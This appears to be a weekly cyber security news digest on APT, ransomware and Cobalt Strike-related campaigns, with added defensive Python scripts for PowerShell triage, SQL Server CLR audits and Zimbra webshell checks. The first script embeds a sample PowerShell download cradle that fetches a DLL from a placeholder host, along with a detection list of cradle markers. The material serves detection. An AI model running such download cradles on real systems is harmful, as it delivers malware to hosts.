Take a look at this week's Cyber Weekly Digest for a rundown of the latest cyber security news. This week we dive into the ransomware operation demanding charity donations instead of a ransom payment and the recent macOS campaign using Geacon, a Go port of the Cobalt Strike beacon. Keep reading to stay up to date.
A previously undocumented advanced persistent threat (APT) actor dubbed Red Stinger has been linked to attacks targeting Eastern Europe since 2020. A recently published report noted, “Military, transportation, and critical infrastructure were some of the entities being targeted, as well as some involved in the September East Ukraine referendums.” “Depending on the campaign, attackers managed to exfiltrate snapshots, USB drives, keyboard strokes, and microphone recordings.” Red Stinger overlaps with a threat actor tracked as Bad Magic, which was reported last month to have targeted government, agriculture, and transportation organisations in Donetsk, Lugansk, and Crimea last year. In this most recent campaign, Red Stinger has used trojanised MSI installers that drop VBS scripts carrying encoded PowerShell arguments to download a further DLL. That DLL installs a command-and-control (C2) client called DBoxShell, which connects back to cloud services as its C2 channel.
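The chain described above (script host launching PowerShell with an encoded command line that fetches a DLL) is one a defender can pick out of ordinary process-creation telemetry. The following is an added example, not code from the report or from the Red Stinger tooling: it decodes the -EncodedCommand argument (base64 over UTF-16LE, which PowerShell also accepts under the short forms -e and -enc) and flags runs spawned from a script host or containing download-cradle markers. The sample events, host paths, URL and marker list are constructed for the example.

```python
import base64
import re

# Markers of a download cradle or DLL staging in a decoded command line.
# The list is this example's own heuristic, not taken from the report.
CRADLE_MARKERS = (
    "downloadfile", "downloadstring", "invoke-webrequest", "net.webclient",
    "frombase64string", "rundll32", "regsvr32", ".dll",
)
# Script hosts that should rarely be the parent of an encoded PowerShell run.
SCRIPT_HOST_PARENTS = {"wscript.exe", "cscript.exe", "msiexec.exe"}


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE.
    Used here only to build the constructed sample events below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded script if the command line carries -EncodedCommand
    (or any unambiguous prefix such as -e / -enc), otherwise None."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]
    for i, tok in enumerate(tokens[:-1]):
        if len(tok) >= 2 and "-encodedcommand".startswith(tok.lower()):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # flag present but payload is not valid base64/UTF-16LE
    return None


def triage_event(event: dict) -> dict:
    """Decode one process-creation event and list why it looks like a stager."""
    decoded = decode_encoded_command(event["command_line"])
    findings = []
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    if decoded is not None:
        if parent in SCRIPT_HOST_PARENTS:
            findings.append(f"encoded PowerShell spawned by {parent}")
        lowered = decoded.lower()
        findings.extend(marker for marker in CRADLE_MARKERS if marker in lowered)
    return {"decoded": decoded, "findings": findings, "suspicious": bool(findings)}


def triage(events) -> list:
    return [triage_event(event) for event in events]


# Constructed sample events in the shape of process-creation telemetry
# (Sysmon event 1 / EDR). Paths and the URL are placeholders.
STAGER = ("(New-Object Net.WebClient).DownloadFile("
          "'https://updates.example.invalid/stage2.dll','C:\\ProgramData\\stage2.dll')")
SAMPLE_EVENTS = [
    {   # VBS dropped by an installer spawning hidden, encoded PowerShell
        "parent_image": r"C:\Windows\System32\wscript.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -NoP -w hidden -enc " + encode_command(STAGER),
    },
    {   # benign encoded command launched interactively
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -EncodedCommand " + encode_command("Get-Date"),
    },
    {   # no encoded command at all
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": 'cmd.exe /c "dir C:\\Users"',
    },
]

if __name__ == "__main__":
    for event, result in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(result["suspicious"], event["parent_image"], result["findings"])
```

Feed it the parent image and command line fields from your own process logs; the decoded script is returned alongside the findings so an analyst can read what the stager actually did rather than just the base64 blob.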
Poorly managed Microsoft SQL (MS SQL) servers are the target of a new campaign designed to propagate a category of malware called CLR SqlShell, which ultimately facilitates the deployment of cryptocurrency miners and ransomware. A recent report noted that “Similar to web shell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behaviour.” A stored procedure is a subroutine that contains a set of SQL statements for use across multiple programs in a relational database management system (RDBMS); CLR SqlShell takes the form of such a procedure, implemented in a .NET assembly loaded into the server through SQL Server's CLR integration. “SqlShell can install additional malware such as backdoors, coin miners, and proxyware, or it can execute malicious commands received from threat actors in a way similar to WebShell.”
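Because SqlShell lives inside the database as a CLR assembly, the first check on a suspect MS SQL server is to list the user-defined assemblies and the CLR configuration, then judge each assembly by its permission set (SAFE_ACCESS cannot reach outside the database; EXTERNAL_ACCESS and UNSAFE_ACCESS can touch files, the network and unmanaged code, which is what a shell needs). The block below is an added example, not code from the report: the T-SQL string documents which catalog views to query, and the Python logic scores the rows against a DBA-maintained allowlist. The sample configuration, rows, database names and assembly names are constructed for the example.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# T-SQL that produces the inputs below, run against each database. It is this
# example's own query over the documented catalog views.
CLR_AUDIT_SQL = """
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('clr enabled', 'clr strict security');

SELECT DB_NAME() AS database_name, a.name, a.permission_set_desc,
       o.name AS object_name, o.type_desc
FROM sys.assemblies AS a
LEFT JOIN sys.assembly_modules AS m ON m.assembly_id = a.assembly_id
LEFT JOIN sys.objects AS o ON o.object_id = m.object_id
WHERE a.is_user_defined = 1;
"""

# Permission sets that let managed code leave the database sandbox.
EXTERNAL_SETS = {"EXTERNAL_ACCESS", "UNSAFE_ACCESS"}
SEVERITY_RANK = {"high": 0, "medium": 1}


@dataclass(frozen=True)
class AssemblyRow:
    database: str
    name: str
    permission_set_desc: str           # SAFE_ACCESS / EXTERNAL_ACCESS / UNSAFE_ACCESS
    object_name: Optional[str] = None  # module bound to the assembly, if any
    type_desc: Optional[str] = None    # e.g. CLR_STORED_PROCEDURE, CLR_SCALAR_FUNCTION


def audit_clr(config: Dict[str, int], rows: List[AssemblyRow],
              allowlist=frozenset()) -> List[dict]:
    """Return findings, highest severity first. allowlist holds
    (database, assembly) pairs the DBA has approved."""
    findings = []
    if config.get("clr enabled", 0) == 1 and not rows:
        findings.append({"severity": "medium", "database": None, "assembly": None,
                         "reason": "CLR is enabled but no user assembly uses it; "
                                   "disable with sp_configure 'clr enabled', 0"})
    if config.get("clr strict security", 1) == 0:
        findings.append({"severity": "medium", "database": None, "assembly": None,
                         "reason": "'clr strict security' is off, so assemblies are not "
                                   "all treated as UNSAFE and need not be signed"})
    for row in rows:
        if (row.database, row.name) in allowlist:
            continue
        external = row.permission_set_desc in EXTERNAL_SETS
        bound = f", bound to {row.type_desc} {row.object_name}" if row.object_name else ""
        findings.append({
            "severity": "high" if external else "medium",
            "database": row.database,
            "assembly": row.name,
            "reason": f"unapproved user assembly with {row.permission_set_desc}{bound}",
        })
    return sorted(findings, key=lambda f: SEVERITY_RANK[f["severity"]])


# Constructed sample: what the query above might return on a server that has
# one legitimate reporting assembly next to two that nobody approved.
SAMPLE_CONFIG = {"clr enabled": 1, "clr strict security": 0}
SAMPLE_ROWS = [
    AssemblyRow("Finance", "ReportingHelpers", "SAFE_ACCESS", "fn_FormatInvoice", "CLR_SCALAR_FUNCTION"),
    AssemblyRow("msdb", "UpdHelper", "UNSAFE_ACCESS", "sp_upd_exec", "CLR_STORED_PROCEDURE"),
    AssemblyRow("master", "Payload", "EXTERNAL_ACCESS"),
]
APPROVED = frozenset({("Finance", "ReportingHelpers")})

if __name__ == "__main__":
    for finding in audit_clr(SAMPLE_CONFIG, SAMPLE_ROWS, APPROVED):
        print(finding["severity"], finding["database"], finding["assembly"], finding["reason"])
```

An assembly with UNSAFE_ACCESS registered as a stored procedure in msdb or master, with no change record behind it, is exactly what to pull for analysis; the assembly bytes themselves can be exported from sys.assembly_files for reverse engineering.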
Geacon, a Go-based implementation of the beacon from the widely abused penetration testing suite Cobalt Strike, is increasingly being used to target macOS devices. Both Geacon and Cobalt Strike are utilities that legitimate organisations use to simulate attacks against their networks and improve defences, but threat actors have also relied on them for attacks. In the case of Cobalt Strike, threat actors have been abusing it to compromise Windows systems for years, with the infosec industry making a continuous effort to fight it. Security researchers at SentinelOne monitoring Geacon activity in the wild have noticed an increase in Geacon payloads submitted to VirusTotal lately. Although some showed signs of being part of a red team operation, others had the traits of malicious attacks. While SentinelOne agrees that some of the observed Geacon activity is likely linked to legitimate red team operations, there is a good chance that real adversaries “will make use of the public and possibly even the private forks of Geacon.”
A joint advisory published by US and Australian government agencies, led by the Cybersecurity and Infrastructure Security Agency (CISA), warns organisations of the latest tactics, techniques, and procedures (TTPs) used by the BianLian ransomware group. BianLian is a ransomware and data extortion group that has targeted US and Australian critical infrastructure entities since June 2022. BianLian initially employed a double-extortion model, encrypting systems after stealing private data from victim networks and then threatening to publish the files. However, since January 2023, when Avast released a decryptor for the ransomware, the group has switched to extortion based on data theft alone, without encrypting systems. CISA’s advisory warns that BianLian breaches systems using valid Remote Desktop Protocol (RDP) credentials, possibly purchased from initial access brokers or acquired through phishing. The recommended mitigations include limiting the use of RDP and other remote desktop services, disabling command-line and scripting activities, and restricting the use of PowerShell on critical systems.
A new ransomware operation is hacking Zimbra servers to steal emails and encrypt files. However, instead of demanding a ransom payment, the attackers claim to require a donation to charity before they will provide a decryptor and refrain from leaking the stolen data. The ransomware operation, dubbed MalasLocker, began encrypting Zimbra servers towards the end of March 2023, with victims reporting in both the BleepingComputer and Zimbra forums that their emails had been encrypted. Numerous victims in the Zimbra forums report finding suspicious JSP files uploaded to the /opt/zimbra/jetty_base/webapps/zimbra/ or /opt/zimbra/jetty/webapps/zimbra/public folders. These files were identified on VirusTotal and by BleepingComputer as being based on an open-source webshell. When encrypting email messages, no extra file extension is appended to the file’s name. However, security researcher MalwareHunterTeam told BleepingComputer that they append a “This file is encrypted, look for README.txt for decryption instructions” message at the end of every encrypted file.
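Two artefacts from the paragraph above make a quick triage possible on a Zimbra host: JSP files that appeared in the webapp directories after the last legitimate patch, and encrypted messages that keep their original name but end in the reported marker string. The script below is an added example, not code from BleepingComputer or the Zimbra project: it lists recently modified JSP files under the two reported directories and scans a message store for the trailer by reading only the tail of each file. The message-store path /opt/zimbra/store and the demo directory tree are assumptions and constructed data for the example.

```python
import os
import tempfile
import time
from pathlib import Path
from typing import List

# Drop locations named by victims in the Zimbra forums.
ZIMBRA_WEBAPP_DIRS = [
    Path("/opt/zimbra/jetty_base/webapps/zimbra"),
    Path("/opt/zimbra/jetty/webapps/zimbra/public"),
]
# Zimbra's message store; an assumption of this example, not named in the report.
ZIMBRA_STORE_DIR = Path("/opt/zimbra/store")
# Marker MalwareHunterTeam reported at the end of every encrypted file.
ENCRYPTED_TRAILER = b"This file is encrypted, look for README.txt for decryption instructions"


def find_jsp_files(root: Path, modified_after: float = 0.0) -> List[Path]:
    """List .jsp files under root modified after the given epoch time
    (e.g. the last legitimate Zimbra patch), newest first."""
    hits = [p for p in root.rglob("*.jsp") if p.is_file() and p.stat().st_mtime > modified_after]
    return sorted(hits, key=lambda p: p.stat().st_mtime, reverse=True)


def has_encrypted_trailer(path: Path, tail_bytes: int = 4096) -> bool:
    """Read only the end of the file: the marker is appended and the name is unchanged,
    so there is no point hashing whole mailboxes."""
    with path.open("rb") as fh:
        fh.seek(0, os.SEEK_END)
        fh.seek(max(0, fh.tell() - tail_bytes))
        return ENCRYPTED_TRAILER in fh.read()


def find_encrypted_files(root: Path) -> List[Path]:
    return sorted(p for p in root.rglob("*") if p.is_file() and has_encrypted_trailer(p))


def build_demo_tree(base: Path) -> dict:
    """Constructed stand-in for a Zimbra install: one JSP shipped with the product
    (old mtime), one uploaded JSP, one encrypted message and one untouched message."""
    webapp = base / "jetty_base" / "webapps" / "zimbra"
    store = base / "store"
    (webapp / "public").mkdir(parents=True)
    store.mkdir(parents=True)
    shipped = webapp / "index.jsp"
    shipped.write_text("<%-- constructed: file shipped with the product --%>\n")
    old = time.time() - 90 * 86400
    os.utime(shipped, (old, old))
    uploaded = webapp / "public" / "upload.jsp"
    uploaded.write_text("<%-- constructed placeholder for an uploaded webshell --%>\n")
    encrypted = store / "1.msg"
    encrypted.write_bytes(b"\x8a\x17\x42 constructed ciphertext bytes " + ENCRYPTED_TRAILER)
    clean = store / "2.msg"
    clean.write_bytes(b"From: alice@example.invalid\r\nSubject: constructed sample\r\n\r\nhello\r\n")
    return {"webapp": webapp, "store": store}


def triage_host(webapp_dirs: List[Path], store_dir: Path, modified_after: float) -> dict:
    """Run both checks over real or demo paths; missing directories are skipped."""
    recent = []
    for directory in webapp_dirs:
        if directory.is_dir():
            recent.extend(find_jsp_files(directory, modified_after))
    encrypted = find_encrypted_files(store_dir) if store_dir.is_dir() else []
    return {"recent_jsp": [p.name for p in recent],
            "encrypted": [p.name for p in encrypted]}


def run_demo() -> dict:
    demo = build_demo_tree(Path(tempfile.mkdtemp()))
    since = time.time() - 30 * 86400  # roughly when the campaign began
    result = triage_host([demo["webapp"]], demo["store"], since)
    result["all_jsp"] = [p.name for p in find_jsp_files(demo["webapp"])]
    return result


if __name__ == "__main__":
    print(run_demo())
    # On a real host: triage_host(ZIMBRA_WEBAPP_DIRS, ZIMBRA_STORE_DIR, <patch time>)
```

Pass the mtime of the last legitimate Zimbra upgrade as the cut-off; a JSP newer than that in either directory deserves a look even if its name looks harmless, since the uploaded files were based on a public webshell and can be renamed freely.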